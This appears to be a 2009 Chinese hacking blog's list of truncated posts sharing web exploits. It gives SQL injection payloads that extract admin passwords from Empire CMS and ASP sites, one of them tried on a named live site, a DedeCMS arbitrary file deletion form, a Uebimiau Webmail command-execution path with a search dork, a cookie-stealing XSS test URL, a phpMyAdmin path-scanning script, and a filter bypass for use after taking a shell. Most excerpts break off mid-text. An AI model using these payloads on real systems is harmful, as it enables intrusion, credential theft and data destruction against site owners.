2009-07-04 21:57
本文章简单摘要:举个例子说一下,我们得到一个注入点:jmdcw.asp?name=aa'and1=1and''=',如果替换其中的1=1为查询管理员的密码的语句:(selectasc(mid(pass,1,1))from[name]whereid=1)>49如何用空格呢?其实可以写成这样的:jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]whe...文章由[ARP联盟:www.arpun.com供稿]作者发表于2009-7-1 10:59:54。文章关键词:利用“()”绕过空格继续注射,黑客技术
举个例 子说一下,我们得到一个 |
2009-07-03 14:38
摘自:teN.potgnayiaH.wwW vbs小铺
先请看图

是我用restorator 打开nusrmgr.cpl时的情形。你看到了什么?是不是很吃惊,原来xp中控制面板中的“用户帐户”选项竟然是html做的。其实不然,微软的好多组件的面板都是html做的。这也是微软为什么一直无法清掉ie的原因,它牵涉太多了,就算是反垄断法也不可能让微软删掉ie的。
看到图 |
2009-06-29 11:27
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
作者:未知
Php168的一个本地文件包含漏洞
看的是v6版的,在do/job.php文件:
...
}elseif(ereg("^([-_0-9a-zA-Z]+)$",$_GET[job])||ereg("^([-_0-9a-zA-Z]+)$",$_POST[job])){
require(dirname(__FILE__)."/"."global.php");
if(is_file(PHP168_PATH."inc/job/$jo |
2009-06-26 18:28
来源:网络
作者:不详
<?php
$list = array(
'/phpmyadmin/',
'/phpMyAdmin/',
'/PMA/',
'/pma/',
'/admin/',
'/dbadmin/',
'/mysql/',
'/myadmin/',
'/phpmyadmin2/',
'/phpMyAdmin2/',
'/phpMyAdmin-2/',
'/php-my-admin/',
'/phpMyAdmin-2.2.3/',
'/phpMyAdmin-2.2.6/',
'/phpMyAdmin-2.5.1/',
'/phpMyAdmin-2.5.4/',
'/phpMyAdmin-2.5.5-rc1/',
'/phpMyAdmin-2.5.5-rc2/',
'/phpMyAdmin-2.5.5/',
'/phpMyAdmin-2. |
2009-06-22 22:02
esunk.cn
我们平常挂马无外乎就那么几种方式,如框架挂马、js挂马、css挂马。
txt不是文本 文件吗?它如何挂马?且听我慢慢道来,很简单的说。
如果有人给你发个一个类似 http://www.xxx.com/test.txt的链接,你敢不敢打开?如果你觉得这只是一个txt文件,打开就打开,没有 |
2009-06-22 21:55
官方已出补丁,相关用户请及时修正
首发:www.YDTeam.Com
1.删除网站任意文件.
2.爆绝对路径
影响系统 = DedeCMS V5.3
1.删除任意文件.
注册正常用户...随意找个地方上传个附件就OK.
部分代码:
复制代码
<form class="mTB10 mL10 mR10" name="form1" action="http://网站地址/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hi |
2009-06-22 21:48
来源:互联网
作者:未知
今天看东西看累了,就随便下载了这样的一套代码。
大家可以看下他的说明,号称完全防注入攻击,密码32位Md5加密。
看了一下大部分注射是基本不可能了,除非对方漏写东西。
但是有这样一个比较可说的漏洞。
cf_do.php
Code:
//留言
if($action=="gbookaddsave")
{
$username=chkstr($_GET["username"],1);
$content=HTMLSpecialChars(chkstr($_POST["content"],1));
$contact=HTMLSpecialCha |
2009-06-22 21:45
幻泉[B.S.N] 黑客防线
漏洞等级:中等
漏洞说明:
漏洞出现在js.asp中,我们首先看源代码。
Code:
If CheckStr(Request("ClassNo")) <> "" then
ClassNo = split(CheckStr(Request("ClassNo")),"|")
'这里是获取变量利用checkstr过滤,但是感觉好像没起作用。然后分成数组
on error resume next
NClassID = LaoYRequest(ClassNo(0))
NClassID1 = LaoYRequest(ClassNo(1))
'获取数组1,与数组2进行整 |
2009-06-15 12:53
来源:互联网
作者:未知
goole 搜 Uebimiau Webmail
地址后面加 /uebimiau/admin/editor.php?load=config 被人拿了 加 /uebimiau/index.php?cmd=id
全部是外国的 ,,,高手可以玩玩。。。。。。。
漏洞公布时间 2009 6 。12
==========================================================
Uebimiau Webmail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities
Dork : Uebimiau Webmail v3.2.0-1.8
POC :
|
2009-06-15 12:52
摘自:woyigui.cn
漏洞描述:
Z-BLOG后台登陆错误信息显示文件c_error.asp,虽然对跳转URL的参数sourceurl进行了编码,但没有判断链接头部,执行了javascript伪协议,造成跨站脚本漏洞。
漏洞测试:
http://www.网址.com/function/c_error.asp?errorid=7&number=0&description=&source=&sourceurl=javascript:alert(document.cookie) |
2009-06-15 12:52
来源:互联网
作者:未知
当你拿到shell以后 发现对方的 不知道是防火墙 还是 ids 还是 hips 或者某某山寨产品 竟然把
\ 给过滤了 ,无法路径跳转 很不方便的说
下面提供邪恶的一小段代码 以备急时所需
%tmp:~2,1% |
2009-06-15 12:41
普瑞斯特
深灰丢出来的0day.
找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1
出来的是帝国CMS的留言本,在姓名处写:縗\
联系邮箱处写:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from
phome_enewsuser where userid=1),1,1,1,0,0,0)/*
提交后爆出账号密码
拿了个黑客站开刀:
http://www.hackfield.com/e/tool/gbook/?bid=1
密码32位MD5加密,后台木有找到=.=
|
2009-06-11 13:34
信息来源:
<*来源: woyigui
添加时间:
2009-05-23
系统编号:
WAVDB-01429
影响版本:
CuteEditor For Net 6.4
程序介绍:
CuteEditor for ASP.NET是建立在Html基础之上,最简单易用、功能最强大的所见即所得Asp.net在线编辑器。
漏洞分析:
在 Load.ashx 文件中未对file参数进行处理,可以加载任意文件。
漏洞利用:
|
2009-06-11 13:34
2009-06-11 13:26
**************************
By:XoL-!
http://www.tsbct.com
**************************
发现日期:
2008-09-25
影响版本: v10.0 v11.0
Exploit:
|
|
|
瘋吇ぺx
男, 101岁
吉林 长春
上次登录: 23小时前
加为好友
|